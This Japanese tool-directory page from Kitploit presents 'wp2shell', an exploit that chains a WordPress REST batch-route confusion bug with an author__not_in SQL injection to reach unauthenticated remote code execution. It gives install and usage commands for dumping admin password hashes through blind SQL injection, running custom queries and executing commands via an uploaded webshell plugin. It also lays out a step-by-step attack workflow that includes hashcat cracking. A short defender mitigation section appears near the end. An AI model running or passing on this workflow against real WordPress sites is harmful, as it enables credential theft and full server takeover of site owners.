Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wp2shell — CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi) | Kitploit
ツール/GitHubGitHub/ekomssavior/wp2shell
パスワードクラッキングペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストレッドチーミング
GitHubekomssavior/wp2shell

wp2shell

CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi)

リポジトリを見る
821ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

wp2shell 作者: ek0ms savi0r

WordPress Core 向けの未認証リモートコード実行 POC (CVE-2026-63030 + CVE-2026-60137)

wp2shell は、WordPress コアの重大な脆弱性チェーンを利用するエクスプロイトです。REST API のバッチルート混乱バグと WP_Query の SQL インジェクションを組み合わせ、脆弱な WordPress インストール上で 未認証のリモートコード実行 を達成します。

詳細情報
CVECVE-2026-63030 (REST バッチルート混乱) + CVE-2026-60137 (author__not_in SQLi)
影響を受けるバージョンWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
修正バージョン6.9.5, 7.0.2
認証要件なし — 未認証
CVSS重大 (RCE チェーン)
発見者Adam Kues (Assetnote / Searchlight Cyber)
依存関係Python 3.8+ — 標準ライブラリのみ

動作の仕組み

このエクスプロイトは、WordPress コアの2つのバグを連鎖させます。

  1. CVE-2026-60137 — SQL インジェクション – author__not_in が配列ではなく 文字列 として渡されると、WordPress は is_array() によるサニタイズチェックをスキップし、生の値を NOT IN (...) SQL 句に直接展開します。

  2. CVE-2026-63030 — バッチルート混乱 – /wp-json/batch/v1 エンドポイントは、$matches と $validation の並列配列を構築します。不正な形式のサブリクエストが $validation に追加されますが $matches には追加されず、+1 のインデックスシフトが発生します。サブリクエスト i は、サブリクエスト i+1 のハンドラでディスパッチされます。

連鎖により: 内部に author_exclude 文字列を含む GET /wp/v2/users リクエストを伴う POST /wp/v2/posts リクエストが、メソッド許可リストと入力サニタイズの両方をバイパスします。その文字列は WP_Query に author__not_in として到達し、SQL に展開されます — これにより 未認証のブラインド SQL インジェクション が実現します。

そこから、このツールは以下を実行できます。

  • 管理者パスワードハッシュの抽出
  • 管理者として認証 (ハッシュが解読された後)
  • 悪意のあるプラグインのアップロード
  • 任意のシステムコマンドの実行

機能


インストール

root@kitploit:~
git clone https://github.com/ekomsSavior/wp2shell.git
cd wp2shell
chmod +x wp2shell.py

以上です。サードパーティのパッケージは必要ありません。


使い方

root@kitploit:~
./wp2shell.py <url> [command] [options]

対話モード (メニュー駆動)

root@kitploit:~
./wp2shell.py http://target.com

すべての機能を番号付きオプションで提供する対話型メニューを起動します。

コマンド

check — 脆弱性の確認 (安全)

時間遅延プローブを実行して悪用可能性を確認します。データを読み取らず、何も変更しません。

root@kitploit:~
./wp2shell.py http://target.com check

read — データ抽出 (ブラインド SQL インジェクション)

時間ベースのブラインド SQL インジェクションを使用してデータベースから情報を抽出します。

root@kitploit:~
# サーバーフィンガープリント (バージョン、データベース、ユーザー)
./wp2shell.py http://target.com read

# ユーザーログインとパスワードハッシュの抽出
./wp2shell.py http://target.com read --users

# データベース名の抽出
./wp2shell.py http://target.com read --database

# MySQL バージョンの抽出
./wp2shell.py http://target.com read --version

# カスタム SQL クエリ
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — リモートコード実行

有効な管理者認証情報が必要です。 SQL インジェクションでパスワードハッシュを取得できますが、回復された平文パスワードを提供する必要があります。

root@kitploit:~
# 単一コマンドの実行
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# 単一コマンドの実行 (短縮形)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

オプション


使用例ワークフロー

root@kitploit:~
# 1. ターゲットが脆弱かどうかを確認
./wp2shell.py https://example.com check

# 2. 管理者パスワードハッシュを抽出
./wp2shell.py https://example.com read --users

# 3. ハッシュをオフラインで解読 (hashcat、john などを使用)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. 回復したパスワードでコマンドを実行
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

影響を受けるバージョン

ブランチ影響あり修正済み
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (SQLi のみ、RCE なし)6.8.6

6.9.0 より前のバージョンは、完全な RCE チェーンの影響を受けません。


検出と緩和策

防御側向け:

  • 直ちに 6.9.5、7.0.2 以降に更新
  • Cloudflare WAF のお客様は自動的に保護されます
  • Wordfence のお客様はファイアウォールルールが適用されています
  • ネストされた requests ボディを持つ POST /wp-json/batch/v1 リクエストを監視
  • バッチルートで 404 が返ってきても必ずしも「修正済み」とは限りません — WAF/CDN が匿名の REST API アクセスをブロックしている可能性もあります

法的免責事項

このツールは教育および許可されたセキュリティテスト目的にのみ使用してください。


クレジット

  • 発見者: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQLi): TF1T, dtro, haongo
  • CVE-2026-63030 (バッチルート混乱): Adam Kues

脆弱性の詳細については、Searchlight Cyber research blog を参照してください。

ツールをダウンロード
機能説明
脆弱性チェック安全な時間遅延プローブ — データを読み取らず、何も変更しません
データ抽出バイナリサーチ最適化によるブラインド SQL インジェクションで効率的に抽出
ユーザーハッシュダンプwp_users から user_login と user_pass のハッシュを抽出
リモートコード実行管理者として認証、Webshell プラグインのアップロード、コマンド実行
インタラクティブシェル永続的なコマンド実行セッション
カラー出力スキャン結果の明確な視覚的フィードバック
依存関係なしPython 標準ライブラリのみを使用
オプション説明
--userswp_users から user_login と user_pass を抽出
--database現在のデータベース名を抽出
--versionMySQL バージョンを抽出
--query "SQL"カスタム SQL クエリを実行 (ブラインド抽出)
--user USERRCE 用の管理者ユーザー名
--password PASSRCE 用の管理者パスワード (平文、SQLi 経由で取得)
--cmd CMDWebshell 経由で実行するコマンド